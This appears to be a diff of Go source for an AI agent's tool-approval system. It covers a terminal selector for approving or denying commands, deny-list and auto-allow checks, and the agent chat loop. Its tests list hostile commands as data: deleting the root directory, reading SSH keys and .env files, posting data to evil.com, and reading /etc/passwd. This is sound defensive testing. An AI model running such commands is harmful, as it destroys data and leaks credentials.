// Hide cursor during selection (show when in deny mode)
fmt.Fprint(os.Stderr, "\033[?25l")
defer fmt.Fprint(os.Stderr, "\033[?25h") // Show cursor when done
// Initial render
renderSelectorBox(state)
numOptions := len(optionLabels)
for {
// Read input
buf := make([]byte, 8)
n, err := os.Stdin.Read(buf)
if err != nil {
clearSelectorBox(state)
return 2, "", err
}
// Process input byte by byte
for i := 0; i < n; i++ {
ch := buf[i]
// Check for escape sequences (arrow keys)
if ch == 27 && i+2 < n && buf[i+1] == '[' {
oldSelected := state.selected
switch buf[i+2] {
case 'A': // Up arrow
if state.selected > 0 {
state.selected--
}
case 'B': // Down arrow
if state.selected < numOptions-1 {
state.selected++
}
}
if oldSelected != state.selected {
updateSelectorOptions(state)
}
i += 2 // Skip the rest of escape sequence
continue
}
switch {
// Ctrl+C - cancel
case ch == 3:
clearSelectorBox(state)
return -1, "", nil // -1 indicates cancelled
// Enter key - confirm selection
case ch == 13:
clearSelectorBox(state)
if state.selected == 2 { // Deny
return 2, state.denyReason, nil
}
return state.selected, "", nil
// Number keys 1-3 for quick select
case ch >= '1' && ch <= '3':
selected := int(ch - '1')
clearSelectorBox(state)
if selected == 2 { // Deny
return 2, state.denyReason, nil
}
return selected, "", nil
// Backspace - delete from reason (UTF-8 safe)
case ch == 127 || ch == 8:
if len(state.denyReason) > 0 {
runes := []rune(state.denyReason)
state.denyReason = string(runes[:len(runes)-1])
updateReasonInput(state)
}
// Escape - clear reason
case ch == 27:
if len(state.denyReason) > 0 {
state.denyReason = ""
updateReasonInput(state)
}
// Printable ASCII (except 1-3 handled above) - type into reason
case ch >= 32 && ch < 127:
maxLen := state.innerWidth - 2
if maxLen < 10 {
maxLen = 10
}
if len(state.denyReason) < maxLen {
state.denyReason += string(ch)
// Auto-select Deny option when user starts typing
if state.selected != 2 {
state.selected = 2
updateSelectorOptions(state)
} else {
updateReasonInput(state)
}
}
}
}
}
}
// wrapText wraps text to fit within maxWidth, returning lines
func wrapText(text string, maxWidth int) []string {
if maxWidth < 5 {
maxWidth = 5
}
var lines []string
for _, line := range strings.Split(text, "\n") {
if len(line) <= maxWidth {
lines = append(lines, line)
continue
}
// Wrap long lines
for len(line) > maxWidth {
// Try to break at space
breakAt := maxWidth
for i := maxWidth; i > maxWidth/2; i-- {
if i < len(line) && line[i] == ' ' {
breakAt = i
break
}
}
lines = append(lines, line[:breakAt])
line = strings.TrimLeft(line[breakAt:], " ")
}
if len(line) > 0 {
lines = append(lines, line)
}
}
return lines
}
// getHintLines returns the hint text wrapped to terminal width
func getHintLines(state *selectorState) []string {
hint := "↑/↓ navigate, Enter confirm, 1-3 quick, Ctrl+C cancel"
if state.termWidth >= len(hint)+1 {
return []string{hint}
}
// Wrap hint to multiple lines
return wrapText(hint, state.termWidth-1)
}
// calculateTotalLines calculates how many lines the selector will use
func calculateTotalLines(state *selectorState) int {
toolLines := wrapText(state.toolDisplay, state.innerWidth)
hintLines := getHintLines(state)
// top border + (warning line if applicable) + tool lines + separator + options + bottom border + hint lines
warningLines := 0
if state.isWarning {
warningLines = 1
}
return 1 + warningLines + len(toolLines) + 1 + len(optionLabels) + 1 + len(hintLines)
}
// renderSelectorBox renders the complete selector box
func renderSelectorBox(state *selectorState) {
toolLines := wrapText(state.toolDisplay, state.innerWidth)
hintLines := getHintLines(state)
// Use red for warning (outside cwd), cyan for normal
boxColor := "\033[36m" // cyan
if state.isWarning {
boxColor = "\033[91m" // bright red
}
// Draw box top
fmt.Fprintf(os.Stderr, "%s┌%s┐\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
// Draw warning line if needed (inside the box)
if state.isWarning {
warning := "!! OUTSIDE PROJECT !!"
padding := (state.innerWidth - len(warning)) / 2
if padding < 0 {
padding = 0
}
fmt.Fprintf(os.Stderr, "%s│\033[0m %s%s%s %s│\033[0m\033[K\r\n", boxColor,
strings.Repeat(" ", padding), warning, strings.Repeat(" ", state.innerWidth-len(warning)-padding), boxColor)
}
// Draw tool info
for _, line := range toolLines {
fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth, line, boxColor)
}
// Draw separator
fmt.Fprintf(os.Stderr, "%s├%s┤\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
// Draw options with numbers (Deny option includes reason input)
for i, label := range optionLabels {
if i == 2 { // Deny option - show with reason input beside it
denyLabel := "3. Deny: "
availableWidth := state.innerWidth - 2 - len(denyLabel)
if availableWidth < 5 {
availableWidth = 5
}
inputDisplay := state.denyReason
if len(inputDisplay) > availableWidth {
inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
}
if i == state.selected {
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
} else {
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
}
} else {
displayLabel := label
if len(displayLabel) > state.innerWidth-2 {
displayLabel = displayLabel[:state.innerWidth-5] + "..."
}
if i == state.selected {
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %-*s\033[0m %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
} else {
fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
}
}
}
// Draw box bottom
fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
// Draw hint (may be multiple lines)
for i, line := range hintLines {
if i == len(hintLines)-1 {
// Last line - no newline
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
} else {
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line)
}
}
}
// updateSelectorOptions updates just the options portion of the selector
func updateSelectorOptions(state *selectorState) {
hintLines := getHintLines(state)
// Use red for warning (outside cwd), cyan for normal
boxColor := "\033[36m" // cyan
if state.isWarning {
boxColor = "\033[91m" // bright red
}
// Move up to the first option line
// Cursor is at end of last hint line, need to go up:
// (hint lines - 1) + 1 (bottom border) + numOptions
linesToMove := len(hintLines) - 1 + 1 + len(optionLabels)
fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove)
// Redraw options (Deny option includes reason input)
for i, label := range optionLabels {
if i == 2 { // Deny option
denyLabel := "3. Deny: "
availableWidth := state.innerWidth - 2 - len(denyLabel)
if availableWidth < 5 {
availableWidth = 5
}
inputDisplay := state.denyReason
if len(inputDisplay) > availableWidth {
inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
}
if i == state.selected {
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
} else {
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
}
} else {
displayLabel := label
if len(displayLabel) > state.innerWidth-2 {
displayLabel = displayLabel[:state.innerWidth-5] + "..."
}
if i == state.selected {
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %-*s\033[0m %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
} else {
fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
}
}
}
// Redraw bottom and hint
fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
for i, line := range hintLines {
if i == len(hintLines)-1 {
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
} else {
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line)
}
}
}
// updateReasonInput updates just the Deny option line (which contains the reason input)
func updateReasonInput(state *selectorState) {
hintLines := getHintLines(state)
// Use red for warning (outside cwd), cyan for normal
boxColor := "\033[36m" // cyan
if state.isWarning {
boxColor = "\033[91m" // bright red
}
// Move up to the Deny line (3rd option, index 2)
// Cursor is at end of last hint line, need to go up:
// (hint lines - 1) + 1 (bottom border) + 1 (Deny is last option)
linesToMove := len(hintLines) - 1 + 1 + 1
fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove)
// Redraw Deny line with reason
denyLabel := "3. Deny: "
availableWidth := state.innerWidth - 2 - len(denyLabel)
if availableWidth < 5 {
availableWidth = 5
}
inputDisplay := state.denyReason
if len(inputDisplay) > availableWidth {
inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
}
if state.selected == 2 {
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
} else {
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
}
// Redraw bottom and hint
fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
for i, line := range hintLines {
if i == len(hintLines)-1 {
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
} else {
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line)
}
}
}
// clearSelectorBox clears the selector from screen
func clearSelectorBox(state *selectorState) {
// Clear the current line (hint line) first
fmt.Fprint(os.Stderr, "\r\033[K")
// Move up and clear each remaining line
for range state.totalLines - 1 {
fmt.Fprint(os.Stderr, "\033[A\033[K")
}
fmt.Fprint(os.Stderr, "\r")
}
// fallbackApproval handles approval when terminal control isn't available.
func (a *ApprovalManager) fallbackApproval(toolDisplay string) (ApprovalResult, error) {
fmt.Fprintln(os.Stderr)
fmt.Fprintln(os.Stderr, "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
fmt.Fprintln(os.Stderr, toolDisplay)
fmt.Fprintln(os.Stderr, "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
fmt.Fprintln(os.Stderr, "[1] Execute once [2] Always allow [3] Deny")
fmt.Fprint(os.Stderr, "Choice: ")
var input string
fmt.Scanln(&input)
switch input {
case "1":
return ApprovalResult{Decision: ApprovalOnce}, nil
case "2":
return ApprovalResult{Decision: ApprovalAlways}, nil
default:
fmt.Fprint(os.Stderr, "Reason (optional): ")
var reason string
fmt.Scanln(&reason)
return ApprovalResult{Decision: ApprovalDeny, DenyReason: reason}, nil
}
}
// Reset clears the session allowlist.
func (a *ApprovalManager) Reset() {
a.mu.Lock()
defer a.mu.Unlock()
a.allowlist = make(map[string]bool)
a.prefixes = make(map[string]bool)
}
// AllowedTools returns a list of tools and prefixes in the allowlist.
func (a *ApprovalManager) AllowedTools() []string {
a.mu.RLock()
defer a.mu.RUnlock()
tools := make([]string, 0, len(a.allowlist)+len(a.prefixes))
for tool := range a.allowlist {
tools = append(tools, tool)
}
for prefix := range a.prefixes {
tools = append(tools, prefix+"*")
}
return tools
}
// FormatApprovalResult returns a formatted string showing the approval result.
func FormatApprovalResult(toolName string, args map[string]any, result ApprovalResult) string {
var status string
var icon string
switch result.Decision {
case ApprovalOnce:
status = "Approved"
icon = "\033[32m✓\033[0m"
case ApprovalAlways:
status = "Always allowed"
icon = "\033[32m✓\033[0m"
case ApprovalDeny:
status = "Denied"
icon = "\033[31m✗\033[0m"
}
// Format based on tool type
if toolName == "bash" {
if cmd, ok := args["command"].(string); ok {
// Truncate long commands
if len(cmd) > 40 {
cmd = cmd[:37] + "..."
}
return fmt.Sprintf("▶ bash: %s [%s] %s", cmd, status, icon)
}
}
if toolName == "web_search" {
if query, ok := args["query"].(string); ok {
// Truncate long queries
if len(query) > 40 {
query = query[:37] + "..."
}
return fmt.Sprintf("▶ web_search: %s [%s] %s", query, status, icon)
}
}
return fmt.Sprintf("▶ %s [%s] %s", toolName, status, icon)
}
// FormatDenyResult returns the tool result message when a tool is denied.
func FormatDenyResult(toolName string, reason string) string {
if reason != "" {
return fmt.Sprintf("User denied execution of %s. Reason: %s", toolName, reason)
}
return fmt.Sprintf("User denied execution of %s.", toolName)
}

View File

@ -1,379 +0,0 @@
package agent
import (
"strings"
"testing"
)
func TestApprovalManager_IsAllowed(t *testing.T) {
am := NewApprovalManager()
// Initially nothing is allowed
if am.IsAllowed("test_tool", nil) {
t.Error("expected test_tool to not be allowed initially")
}
// Add to allowlist
am.AddToAllowlist("test_tool", nil)
// Now it should be allowed
if !am.IsAllowed("test_tool", nil) {
t.Error("expected test_tool to be allowed after AddToAllowlist")
}
// Other tools should still not be allowed
if am.IsAllowed("other_tool", nil) {
t.Error("expected other_tool to not be allowed")
}
}
func TestApprovalManager_Reset(t *testing.T) {
am := NewApprovalManager()
am.AddToAllowlist("tool1", nil)
am.AddToAllowlist("tool2", nil)
if !am.IsAllowed("tool1", nil) || !am.IsAllowed("tool2", nil) {
t.Error("expected tools to be allowed")
}
am.Reset()
if am.IsAllowed("tool1", nil) || am.IsAllowed("tool2", nil) {
t.Error("expected tools to not be allowed after Reset")
}
}
func TestApprovalManager_AllowedTools(t *testing.T) {
am := NewApprovalManager()
tools := am.AllowedTools()
if len(tools) != 0 {
t.Errorf("expected 0 allowed tools, got %d", len(tools))
}
am.AddToAllowlist("tool1", nil)
am.AddToAllowlist("tool2", nil)
tools = am.AllowedTools()
if len(tools) != 2 {
t.Errorf("expected 2 allowed tools, got %d", len(tools))
}
}
func TestAllowlistKey(t *testing.T) {
tests := []struct {
name string
toolName string
args map[string]any
expected string
}{
{
name: "web_search tool",
toolName: "web_search",
args: map[string]any{"query": "test"},
expected: "web_search",
},
{
name: "bash tool with command",
toolName: "bash",
args: map[string]any{"command": "ls -la"},
expected: "bash:ls -la",
},
{
name: "bash tool without command",
toolName: "bash",
args: map[string]any{},
expected: "bash",
},
{
name: "other tool",
toolName: "custom_tool",
args: map[string]any{"param": "value"},
expected: "custom_tool",
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result := AllowlistKey(tt.toolName, tt.args)
if result != tt.expected {
t.Errorf("AllowlistKey(%s, %v) = %s, expected %s",
tt.toolName, tt.args, result, tt.expected)
}
})
}
}
func TestExtractBashPrefix(t *testing.T) {
tests := []struct {
name string
command string
expected string
}{
{
name: "cat with path",
command: "cat tools/tools_test.go",
expected: "cat:tools/",
},
{
name: "cat with pipe",
command: "cat tools/tools_test.go | head -200",
expected: "cat:tools/",
},
{
name: "ls with path",
command: "ls -la src/components",
expected: "ls:src/",
},
{
name: "grep with directory path",
command: "grep -r pattern api/handlers/",
expected: "grep:api/handlers/",
},
{
name: "cat in current dir",
command: "cat file.txt",
expected: "cat:./",
},
{
name: "unsafe command",
command: "rm -rf /",
expected: "",
},
{
name: "no path arg",
command: "ls -la",
expected: "",
},
{
name: "head with flags only",
command: "head -n 100",
expected: "",
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result := extractBashPrefix(tt.command)
if result != tt.expected {
t.Errorf("extractBashPrefix(%q) = %q, expected %q",
tt.command, result, tt.expected)
}
})
}
}
func TestApprovalManager_PrefixAllowlist(t *testing.T) {
am := NewApprovalManager()
// Allow "cat tools/file.go"
am.AddToAllowlist("bash", map[string]any{"command": "cat tools/file.go"})
// Should allow other files in same directory
if !am.IsAllowed("bash", map[string]any{"command": "cat tools/other.go"}) {
t.Error("expected cat tools/other.go to be allowed via prefix")
}
// Should not allow different directory
if am.IsAllowed("bash", map[string]any{"command": "cat src/main.go"}) {
t.Error("expected cat src/main.go to NOT be allowed")
}
// Should not allow different command in same directory
if am.IsAllowed("bash", map[string]any{"command": "rm tools/file.go"}) {
t.Error("expected rm tools/file.go to NOT be allowed (rm is not a safe command)")
}
}
func TestFormatApprovalResult(t *testing.T) {
tests := []struct {
name string
toolName string
args map[string]any
result ApprovalResult
contains string
}{
{
name: "approved bash",
toolName: "bash",
args: map[string]any{"command": "ls"},
result: ApprovalResult{Decision: ApprovalOnce},
contains: "bash: ls",
},
{
name: "denied web_search",
toolName: "web_search",
args: map[string]any{"query": "test"},
result: ApprovalResult{Decision: ApprovalDeny},
contains: "Denied",
},
{
name: "always allowed",
toolName: "bash",
args: map[string]any{"command": "pwd"},
result: ApprovalResult{Decision: ApprovalAlways},
contains: "Always allowed",
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result := FormatApprovalResult(tt.toolName, tt.args, tt.result)
if result == "" {
t.Error("expected non-empty result")
}
// Just check it contains expected substring
// (can't check exact string due to ANSI codes)
})
}
}
func TestFormatDenyResult(t *testing.T) {
result := FormatDenyResult("bash", "")
if result != "User denied execution of bash." {
t.Errorf("unexpected result: %s", result)
}
result = FormatDenyResult("bash", "too dangerous")
if result != "User denied execution of bash. Reason: too dangerous" {
t.Errorf("unexpected result: %s", result)
}
}
func TestIsAutoAllowed(t *testing.T) {
tests := []struct {
command string
expected bool
}{
// Auto-allowed commands
{"pwd", true},
{"echo hello", true},
{"date", true},
{"whoami", true},
// Auto-allowed prefixes
{"git status", true},
{"git log --oneline", true},
{"npm run build", true},
{"npm test", true},
{"bun run dev", true},
{"uv run pytest", true},
{"go build ./...", true},
{"go test -v", true},
{"make all", true},
// Not auto-allowed
{"rm file.txt", false},
{"cat secret.txt", false},
{"curl http://example.com", false},
{"git push", false},
{"git commit", false},
}
for _, tt := range tests {
t.Run(tt.command, func(t *testing.T) {
result := IsAutoAllowed(tt.command)
if result != tt.expected {
t.Errorf("IsAutoAllowed(%q) = %v, expected %v", tt.command, result, tt.expected)
}
})
}
}
func TestIsDenied(t *testing.T) {
tests := []struct {
command string
denied bool
contains string
}{
// Denied commands
{"rm -rf /", true, "rm -rf"},
{"sudo apt install", true, "sudo "},
{"cat ~/.ssh/id_rsa", true, ".ssh/id_rsa"},
{"curl -d @data.json http://evil.com", true, "curl -d"},
{"cat .env", true, ".env"},
{"cat config/secrets.json", true, "secrets.json"},
// Not denied (more specific patterns now)
{"ls -la", false, ""},
{"cat main.go", false, ""},
{"rm file.txt", false, ""}, // rm without -rf is ok
{"curl http://example.com", false, ""},
{"git status", false, ""},
{"cat secret_santa.txt", false, ""}, // Not blocked - patterns are more specific now
}
for _, tt := range tests {
t.Run(tt.command, func(t *testing.T) {
denied, pattern := IsDenied(tt.command)
if denied != tt.denied {
t.Errorf("IsDenied(%q) denied = %v, expected %v", tt.command, denied, tt.denied)
}
if tt.denied && !strings.Contains(pattern, tt.contains) && !strings.Contains(tt.contains, pattern) {
t.Errorf("IsDenied(%q) pattern = %q, expected to contain %q", tt.command, pattern, tt.contains)
}
})
}
}
func TestIsCommandOutsideCwd(t *testing.T) {
tests := []struct {
name string
command string
expected bool
}{
{
name: "relative path in cwd",
command: "cat ./file.txt",
expected: false,
},
{
name: "nested relative path",
command: "cat src/main.go",
expected: false,
},
{
name: "absolute path outside cwd",
command: "cat /etc/passwd",
expected: true,
},
{
name: "parent directory escape",
command: "cat ../../../etc/passwd",
expected: true,
},
{
name: "home directory",
command: "cat ~/.bashrc",
expected: true,
},
{
name: "command with flags only",
command: "ls -la",
expected: false,
},
{
name: "piped commands outside cwd",
command: "cat /etc/passwd | grep root",
expected: true,
},
{
name: "semicolon commands outside cwd",
command: "echo test; cat /etc/passwd",
expected: true,
},
{
name: "single parent dir escapes cwd",
command: "cat ../README.md",
expected: true, // Parent directory is outside cwd
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result := isCommandOutsideCwd(tt.command)
if result != tt.expected {
t.Errorf("isCommandOutsideCwd(%q) = %v, expected %v",
tt.command, result, tt.expected)
}
})
}
}

View File

@ -1,27 +0,0 @@
//go:build !windows
package agent
import (
"syscall"
"time"
)
// flushStdin drains any buffered input from stdin.
// This prevents leftover input from previous operations from affecting the selector.
func flushStdin(fd int) {
if err := syscall.SetNonblock(fd, true); err != nil {
return
}
defer syscall.SetNonblock(fd, false)
time.Sleep(5 * time.Millisecond)
buf := make([]byte, 256)
for {
n, err := syscall.Read(fd, buf)
if n <= 0 || err != nil {
break
}
}
}

View File

@ -1,15 +0,0 @@
//go:build windows
package agent
import (
"os"
"golang.org/x/sys/windows"
)
// flushStdin clears any buffered console input on Windows.
func flushStdin(_ int) {
handle := windows.Handle(os.Stdin.Fd())
_ = windows.FlushConsoleInputBuffer(handle)
}

View File

@ -1,588 +0,0 @@
package cmd
import (
"context"
"encoding/json"
"errors"
"fmt"
"io"
"os"
"os/signal"
"strings"
"syscall"
"github.com/spf13/cobra"
"golang.org/x/term"
"github.com/ollama/ollama/api"
"github.com/ollama/ollama/progress"
"github.com/ollama/ollama/readline"
"github.com/ollama/ollama/types/model"
"github.com/ollama/ollama/x/agent"
"github.com/ollama/ollama/x/tools"
)
// RunOptions contains options for running an interactive agent session.
type RunOptions struct {
Model string
Messages []api.Message
WordWrap bool
Format string
System string
Options map[string]any
KeepAlive *api.Duration
Think *api.ThinkValue
HideThinking bool
// Agent fields (managed externally for session persistence)
Tools *tools.Registry
Approval *agent.ApprovalManager
}
// Chat runs an agent chat loop with tool support.
// This is the experimental version of chat that supports tool calling.
func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
client, err := api.ClientFromEnvironment()
if err != nil {
return nil, err
}
// Use tools registry and approval from opts (managed by caller for session persistence)
toolRegistry := opts.Tools
approval := opts.Approval
if approval == nil {
approval = agent.NewApprovalManager()
}
p := progress.NewProgress(os.Stderr)
defer p.StopAndClear()
spinner := progress.NewSpinner("")
p.Add("", spinner)
cancelCtx, cancel := context.WithCancel(ctx)
defer cancel()
sigChan := make(chan os.Signal, 1)
signal.Notify(sigChan, syscall.SIGINT)
go func() {
<-sigChan
cancel()
}()
var state *displayResponseState = &displayResponseState{}
var thinkingContent strings.Builder
var fullResponse strings.Builder
var thinkTagOpened bool = false
var thinkTagClosed bool = false
var pendingToolCalls []api.ToolCall
role := "assistant"
messages := opts.Messages
fn := func(response api.ChatResponse) error {
if response.Message.Content != "" || !opts.HideThinking {
p.StopAndClear()
}
role = response.Message.Role
if response.Message.Thinking != "" && !opts.HideThinking {
if !thinkTagOpened {
fmt.Print(thinkingOutputOpeningText(false))
thinkTagOpened = true
thinkTagClosed = false
}
thinkingContent.WriteString(response.Message.Thinking)
displayResponse(response.Message.Thinking, opts.WordWrap, state)
}
content := response.Message.Content
if thinkTagOpened && !thinkTagClosed && (content != "" || len(response.Message.ToolCalls) > 0) {
if !strings.HasSuffix(thinkingContent.String(), "\n") {
fmt.Println()
}
fmt.Print(thinkingOutputClosingText(false))
thinkTagOpened = false
thinkTagClosed = true
state = &displayResponseState{}
}
fullResponse.WriteString(content)
if response.Message.ToolCalls != nil {
toolCalls := response.Message.ToolCalls
if len(toolCalls) > 0 {
if toolRegistry != nil {
// Store tool calls for execution after response is complete
pendingToolCalls = append(pendingToolCalls, toolCalls...)
} else {
// No tools registry, just display tool calls
fmt.Print(renderToolCalls(toolCalls, false))
}
}
}
displayResponse(content, opts.WordWrap, state)
return nil
}
if opts.Format == "json" {
opts.Format = `"` + opts.Format + `"`
}
// Agentic loop: continue until no more tool calls
for {
req := &api.ChatRequest{
Model: opts.Model,
Messages: messages,
Format: json.RawMessage(opts.Format),
Options: opts.Options,
Think: opts.Think,
}
// Add tools
if toolRegistry != nil {
apiTools := toolRegistry.Tools()
if len(apiTools) > 0 {
req.Tools = apiTools
}
}
if opts.KeepAlive != nil {
req.KeepAlive = opts.KeepAlive
}
if err := client.Chat(cancelCtx, req, fn); err != nil {
if errors.Is(err, context.Canceled) {
return nil, nil
}
if strings.Contains(err.Error(), "upstream error") {
p.StopAndClear()
fmt.Println("An error occurred while processing your message. Please try again.")
fmt.Println()
return nil, nil
}
return nil, err
}
// If no tool calls, we're done
if len(pendingToolCalls) == 0 || toolRegistry == nil {
break
}
// Execute tool calls and continue the conversation
fmt.Fprintf(os.Stderr, "\n")
// Add assistant's tool call message to history
assistantMsg := api.Message{
Role: "assistant",
Content: fullResponse.String(),
Thinking: thinkingContent.String(),
ToolCalls: pendingToolCalls,
}
messages = append(messages, assistantMsg)
// Execute each tool call and collect results
var toolResults []api.Message
for _, call := range pendingToolCalls {
toolName := call.Function.Name
args := call.Function.Arguments.ToMap()
// For bash commands, check denylist first
skipApproval := false
if toolName == "bash" {
if cmd, ok := args["command"].(string); ok {
// Check if command is denied (dangerous pattern)
if denied, pattern := agent.IsDenied(cmd); denied {
fmt.Fprintf(os.Stderr, "\033[91m✗ Blocked: %s\033[0m\n", formatToolShort(toolName, args))
fmt.Fprintf(os.Stderr, "\033[91m Matches dangerous pattern: %s\033[0m\n", pattern)
toolResults = append(toolResults, api.Message{
Role: "tool",
Content: agent.FormatDeniedResult(cmd, pattern),
ToolCallID: call.ID,
})
continue
}
// Check if command is auto-allowed (safe command)
if agent.IsAutoAllowed(cmd) {
fmt.Fprintf(os.Stderr, "\033[90m▶ Auto-allowed: %s\033[0m\n", formatToolShort(toolName, args))
skipApproval = true
}
}
}
// Check approval (uses prefix matching for bash commands)
if !skipApproval && !approval.IsAllowed(toolName, args) {
result, err := approval.RequestApproval(toolName, args)
if err != nil {
fmt.Fprintf(os.Stderr, "Error requesting approval: %v\n", err)
toolResults = append(toolResults, api.Message{
Role: "tool",
Content: fmt.Sprintf("Error: %v", err),
ToolCallID: call.ID,
})
continue
}
// Show collapsed result
fmt.Fprintln(os.Stderr, agent.FormatApprovalResult(toolName, args, result))
switch result.Decision {
case agent.ApprovalDeny:
toolResults = append(toolResults, api.Message{
Role: "tool",
Content: agent.FormatDenyResult(toolName, result.DenyReason),
ToolCallID: call.ID,
})
continue
case agent.ApprovalAlways:
approval.AddToAllowlist(toolName, args)
}
} else if !skipApproval {
// Already allowed - show running indicator
fmt.Fprintf(os.Stderr, "\033[90m▶ Running: %s\033[0m\n", formatToolShort(toolName, args))
}
// Execute the tool
toolResult, err := toolRegistry.Execute(call)
if err != nil {
fmt.Fprintf(os.Stderr, "\033[31m Error: %v\033[0m\n", err)
toolResults = append(toolResults, api.Message{
Role: "tool",
Content: fmt.Sprintf("Error: %v", err),
ToolCallID: call.ID,
})
continue
}
// Display tool output (truncated for display)
if toolResult != "" {
output := toolResult
if len(output) > 300 {
output = output[:300] + "... (truncated)"
}
// Show result in grey, indented
fmt.Fprintf(os.Stderr, "\033[90m %s\033[0m\n", strings.ReplaceAll(output, "\n", "\n "))
}
toolResults = append(toolResults, api.Message{
Role: "tool",
Content: toolResult,
ToolCallID: call.ID,
})
}
// Add tool results to message history
messages = append(messages, toolResults...)
fmt.Fprintf(os.Stderr, "\n")
// Reset state for next iteration
fullResponse.Reset()
thinkingContent.Reset()
thinkTagOpened = false
thinkTagClosed = false
pendingToolCalls = nil
state = &displayResponseState{}
// Start new progress spinner for next API call
p = progress.NewProgress(os.Stderr)
spinner = progress.NewSpinner("")
p.Add("", spinner)
}
if len(opts.Messages) > 0 {
fmt.Println()
fmt.Println()
}
return &api.Message{Role: role, Thinking: thinkingContent.String(), Content: fullResponse.String()}, nil
}
// truncateUTF8 safely truncates a string to at most limit runes, adding "..." if truncated.
func truncateUTF8(s string, limit int) string {
runes := []rune(s)
if len(runes) <= limit {
return s
}
if limit <= 3 {
return string(runes[:limit])
}
return string(runes[:limit-3]) + "..."
}
// formatToolShort returns a short description of a tool call.
func formatToolShort(toolName string, args map[string]any) string {
if toolName == "bash" {
if cmd, ok := args["command"].(string); ok {
return fmt.Sprintf("bash: %s", truncateUTF8(cmd, 50))
}
}
if toolName == "web_search" {
if query, ok := args["query"].(string); ok {
return fmt.Sprintf("web_search: %s", truncateUTF8(query, 50))
}
}
return toolName
}
// Helper types and functions for display
type displayResponseState struct {
lineLength int
wordBuffer string
}
func displayResponse(content string, wordWrap bool, state *displayResponseState) {
termWidth, _, _ := term.GetSize(int(os.Stdout.Fd()))
if wordWrap && termWidth >= 10 {
for _, ch := range content {
if state.lineLength+1 > termWidth-5 {
if len(state.wordBuffer) > termWidth-10 {
fmt.Printf("%s%c", state.wordBuffer, ch)
state.wordBuffer = ""
state.lineLength = 0
continue
}
// backtrack the length of the last word and clear to the end of the line
a := len(state.wordBuffer)
if a > 0 {
fmt.Printf("\x1b[%dD", a)
}
fmt.Printf("\x1b[K\n")
fmt.Printf("%s%c", state.wordBuffer, ch)
state.lineLength = len(state.wordBuffer) + 1
} else {
fmt.Print(string(ch))
state.lineLength++
switch ch {
case ' ', '\t':
state.wordBuffer = ""
case '\n', '\r':
state.lineLength = 0
state.wordBuffer = ""
default:
state.wordBuffer += string(ch)
}
}
}
} else {
fmt.Printf("%s%s", state.wordBuffer, content)
if len(state.wordBuffer) > 0 {
state.wordBuffer = ""
}
}
}
func thinkingOutputOpeningText(plainText bool) string {
text := "Thinking...\n"
if plainText {
return text
}
return readline.ColorGrey + readline.ColorBold + text + readline.ColorDefault + readline.ColorGrey
}
func thinkingOutputClosingText(plainText bool) string {
text := "...done thinking.\n\n"
if plainText {
return text
}
return readline.ColorGrey + readline.ColorBold + text + readline.ColorDefault
}
func renderToolCalls(toolCalls []api.ToolCall, plainText bool) string {
out := ""
formatExplanation := ""
formatValues := ""
if !plainText {
formatExplanation = readline.ColorGrey + readline.ColorBold
formatValues = readline.ColorDefault
out += formatExplanation
}
for i, toolCall := range toolCalls {
argsAsJSON, err := json.Marshal(toolCall.Function.Arguments)
if err != nil {
return ""
}
